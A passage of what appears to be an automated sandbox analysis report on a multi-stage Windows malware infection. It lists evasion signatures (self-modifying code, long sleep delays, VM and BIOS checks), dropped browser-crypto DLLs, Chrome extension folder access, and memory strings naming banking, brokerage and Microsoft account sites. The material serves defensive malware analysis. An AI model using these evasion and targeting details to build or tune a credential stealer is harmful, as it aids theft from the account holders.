                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: E755CE instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSpecial instruction interceptor: First address: 1028D56 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSpecial instruction interceptor: First address: 1028C79 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSpecial instruction interceptor: First address: 1253685 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSpecial instruction interceptor: First address: 797CAA instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSpecial instruction interceptor: First address: 797DAD instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSpecial instruction interceptor: First address: 92D7FD instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSpecial instruction interceptor: First address: 9C2DF2 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSpecial instruction interceptor: First address: 107A39 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSpecial instruction interceptor: First address: 2AA69F instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSpecial instruction interceptor: First address: 2D47A7 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSpecial instruction interceptor: First address: 2AA289 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSpecial instruction interceptor: First address: 3424E5 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSpecial instruction interceptor: First address: 9E4C3F instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSpecial instruction interceptor: First address: A148A0 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSpecial instruction interceptor: First address: 9EDE72 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSpecial instruction interceptor: First address: A7BBC7 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeSpecial instruction interceptor: First address: 10B1B6E instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeSpecial instruction interceptor: First address: EDFFA7 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeSpecial instruction interceptor: First address: 35DD75 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeSpecial instruction interceptor: First address: 503A4E instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeMemory allocated: 1C12E190000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeMemory allocated: A80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeMemory allocated: 24F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeMemory allocated: 44F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeMemory allocated: 4EA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeMemory allocated: 50A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeMemory allocated: 70A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_04DB0D7B rdtsc 0_2_04DB0D7B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1208Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1237Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1236Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1199Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6172
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3640
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWindow / User API: threadDelayed 1254
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWindow / User API: threadDelayed 2106
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWindow / User API: threadDelayed 658
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWindow / User API: threadDelayed 739
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1021720001\91732ff836.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1021718001\6b06c8a266.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[4].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1021719001\24da220eed.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3404Thread sleep count: 1208 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3404Thread sleep time: -2417208s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3044Thread sleep count: 1237 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3044Thread sleep time: -2475237s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4568Thread sleep time: -36000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6788Thread sleep count: 240 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6788Thread sleep time: -7200000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3324Thread sleep count: 1236 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3324Thread sleep time: -2473236s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3428Thread sleep count: 1199 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3428Thread sleep time: -2399199s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe TID: 1772Thread sleep time: -34017s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe TID: 6256Thread sleep time: -32016s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe TID: 6324Thread sleep time: -30015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe TID: 7104Thread sleep time: -270000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe TID: 5624Thread sleep time: -40020s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe TID: 568Thread sleep time: -32016s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe TID: 1788Thread sleep time: -240000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2952Thread sleep count: 6172 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2952Thread sleep count: 3640 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe TID: 6304Thread sleep time: -90000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe TID: 3488Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe TID: 880Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe TID: 6304Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe TID: 1012Thread sleep time: -210000s >= -30000s
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 64Thread sleep count: 658 > 30
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 64Thread sleep time: -658000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4872Thread sleep count: 101 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4872Thread sleep time: -202101s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4400Thread sleep count: 122 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4400Thread sleep time: -244122s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4876Thread sleep count: 114 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4876Thread sleep time: -228114s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 5648Thread sleep time: -32000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 5532Thread sleep time: -270000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 5664Thread sleep count: 125 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 5664Thread sleep time: -250125s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4948Thread sleep count: 94 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4948Thread sleep time: -188094s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 704Thread sleep count: 117 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 704Thread sleep time: -234117s >= -30000s
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 6488Thread sleep count: 739 > 30
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 6488Thread sleep time: -739000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 1032Thread sleep count: 56 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 1032Thread sleep time: -112056s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 5204Thread sleep count: 53 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 5204Thread sleep time: -106053s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 5196Thread sleep count: 53 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 5196Thread sleep time: -106053s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 6212Thread sleep time: -44000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 5512Thread sleep count: 53 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 5512Thread sleep time: -106053s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 428Thread sleep count: 46 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 428Thread sleep time: -92046s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 3616Thread sleep count: 48 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 3616Thread sleep time: -96048s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 512Thread sleep count: 55 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 512Thread sleep time: -110055s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 6996Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe TID: 4000Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeThread delayed: delay time: 30000
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                    Source: b9ba85c997.exe, 0000001D.00000003.2734137272.00000000059E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: 0a7e8af92e.exe, 0000000B.00000002.2345610829.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000000.2185582729.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: 7620ab885d.exe, 00000009.00000003.2061994993.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2175548971.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2153964986.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2186071731.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2154759324.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000002.2467998467.0000000000B9B000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000002.2467266806.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367306642.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2289015343.000000000114E000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000002.2316994067.0000000001165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: skotes.exe, skotes.exe, 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmp, 7620ab885d.exe, 7620ab885d.exe, 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmp, 8469cb4d4d.exe, 0000000A.00000002.2315387552.000000000090E000.00000040.00000001.01000000.0000000A.sdmp, b285303eae.exe, 0000001B.00000002.2818926847.0000000000287000.00000040.00000001.01000000.00000015.sdmp, b285303eae.exe, 0000001B.00000001.2507127937.0000000000287000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
